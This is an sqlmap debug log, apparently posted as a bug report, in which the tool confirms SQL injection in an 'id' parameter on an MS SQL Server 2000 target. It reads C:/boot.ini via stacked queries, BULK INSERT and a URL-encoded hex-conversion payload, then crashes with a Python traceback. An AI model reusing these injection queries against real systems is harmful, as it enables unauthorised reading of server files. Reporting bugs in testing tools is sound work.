./sqlmap.py -v 2 -u target --read-file "C:\boot.ini" --dbms "Microsoft
SQL Server"
sqlmap/0.7rc3
by Bernardo Damele A. G. <ber...@gm...>
[*] starting at: 18:26:09
[18:26:09] [DEBUG] initializing the configuration
[18:26:09] [DEBUG] initializing the knowledge base
[18:26:09] [DEBUG] cleaning up configuration parameters
[18:26:09] [DEBUG] setting the HTTP timeout
[18:26:09] [DEBUG] setting the HTTP method to GET
[18:26:09] [DEBUG] forcing back-end DBMS to user defined value
[18:26:09] [DEBUG] creating HTTP requests opener object
[18:26:09] [DEBUG] parsing XML queries file
[18:26:09] [INFO] testing connection to the target url
[18:26:10] [INFO] testing if the url is stable, wait a few seconds
[18:26:11] [INFO] url is stable
[18:26:11] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[18:26:12] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[18:26:12] [INFO] testing if GET parameter 'id' is dynamic
[18:26:13] [DEBUG] setting match ratio to default value 0.900
[18:26:13] [INFO] confirming that GET parameter 'id' is dynamic
[18:26:13] [INFO] GET parameter 'id' is dynamic
[18:26:13] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[18:26:13] [INFO] testing unescaped numeric injection on GET parameter 'id'
[18:26:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[18:26:14] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[18:26:14] [INFO] testing for parenthesis on injectable parameter
[18:26:15] [INFO] the injectable parameter requires 0 parenthesis
[18:26:15] [DEBUG] skipping test for MySQL
[18:26:15] [DEBUG] skipping test for Oracle
[18:26:15] [DEBUG] skipping test for PostgreSQL
[18:26:15] [INFO] testing Microsoft SQL Server
[18:26:15] [INFO] confirming Microsoft SQL Server
[18:26:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[18:26:16] [INFO] testing stacked queries support on parameter 'id'
[18:26:16] [DEBUG] query: WAITFOR DELAY '0:0:5'
[18:26:21] [INFO] the web application supports stacked queries on parameter 'id'
[18:26:21] [DEBUG] going to read the file with stacked query SQL
injection technique
[18:26:21] [INFO] fetching file: 'C:/boot.ini'
[18:26:21] [DEBUG] query: DROP TABLE sqlmapfile
[18:26:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
[18:26:21] [DEBUG] query: DROP TABLE sqlmapfilehex
[18:26:22] [DEBUG] query: CREATE TABLE sqlmapfilehex(id INT
IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096))
[18:26:22] [DEBUG] loading the content of file 'C:/boot.ini' into support table
[18:26:22] [DEBUG] query: BULK INSERT sqlmapfile FROM 'C:/boot.ini'
WITH (CODEPAGE='RAW', FIELDTERMINATOR='PXrRMcjmNR',
ROWTERMINATOR='EHMuHbObaJ')
[18:26:22] [DEBUG] query:
%20DECLARE%20%40charset%20VARCHAR%2816%29%20DECLARE%20%40counter%20INT%20DECLARE%20%40hexstr%20VARCHAR%284096%29%20DECLARE%20%40length%20INT%20DECLARE%20%40chunk%20INT%20%20SET%20%40charset%20%3D%20%270123456789ABCDEF%27%20SET%20%40counter%20%3D%201%20SET%20%40hexstr%20%3D%20%27%27%20SET%20%40length%20%3D%20%28SELECT%20DATALENGTH%28data%29%20FROM%20sqlmapfile%29%20SET%20%40chunk%20%3D%201024%20%20WHILE%20%28%40counter%20%3C%3D%20%40length%29%20BEGIN%20DECLARE%20%40tempint%20INT%20DECLARE%20%40firstint%20INT%20DECLARE%20%40secondint%20INT%20%20SET%20%40tempint%20%3D%20CONVERT%28INT%2C%20%28SELECT%20ASCII%28SUBSTRING%28data%2C%20%40counter%2C%201%29%29%20FROM%20sqlmapfile%29%29%20SET%20%40firstint%20%3D%20floor%28%40tempint/16%29%20SET%20%40secondint%20%3D%20%40tempint%20-%20%28%40firstint%20%2A%2016%29%20SET%20%40hexstr%20%3D%20%40hexstr%20%2B%20SUBSTRING%28%40charset%2C%20%40firstint%2B1%2C%201%29%20%2B%20SUBSTRING%28%40charset%2C%20%40secondint%2B1%2C%201%29%20%20SET%20%40counter%20%3D%20%40counter%20%2B%201%20%20IF%20%40counter%20%25%20%40chunk%20%3D%200%20BEGIN%20INSERT%20INTO%20sqlmapfilehex%28data%29%20VALUES%28%40hexstr%29%20SET%20%40hexstr%20%3D%20%27%27%20END%20END%20%20IF%20%40counter%20%25%20%28%40chunk%29%20%21%3D%200%20BEGIN%20INSERT%20INTO%20sqlmapfilehex%28data%29%20VALUES%28%40hexstr%29%20END%20
[18:26:22] [DEBUG] query: SELECT ISNULL(CAST(COUNT(data) AS
VARCHAR(8000)), CHAR(32)) FROM sqlmapfilehex
[18:26:22] [INFO] retrieved: 1
[18:26:24] [DEBUG] performed 6 queries in 2 seconds
[18:26:24] [DEBUG] query: SELECT TOP 1 ISNULL(CAST(data AS
VARCHAR(8000)), CHAR(32)) FROM sqlmapfilehex WHERE data NOT IN (SELECT
TOP 0 data FROM sqlmapfilehex ORDER BY id ASC) ORDER BY id ASC
[18:26:24] [INFO] retrieved:
[18:26:26] [DEBUG] performed 4 queries in 1 seconds
[18:26:26] [DEBUG] query: DROP TABLE sqlmapfilehex
[18:26:26] [ERROR] for some reasons sqlmap retrieved an odd-length
hexadecimal string which it is not able to convert to raw string
[18:26:26] [ERROR] unhandled exception in sqlmap/0.7rc3, please copy
the command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon
as possible:
sqlmap version: 0.7rc3
Python version: 2.4.3
Operating system: linux2
Traceback (most recent call last):
File "./sqlmap.py", line 84, in main
start()
File "/home/patrick/skychannel/sqlmap/lib/controller/controller.py",
line 263, in start
File "/home/patrick/skychannel/sqlmap/lib/controller/action.py",
line 130, in action
File "/home/patrick/sqlmap/plugins/generic/filesystem.py", line 315,
in readFile
rFilePath = dataToOutFile(fileContent)
File "/home/patrick/sqlmap/lib/core/common.py", line 342, in dataToOutFile
rFileFP.write(data)
TypeError: argument 1 must be string or read-only buffer, not list
[*] shutting down at: 18:26:26
|
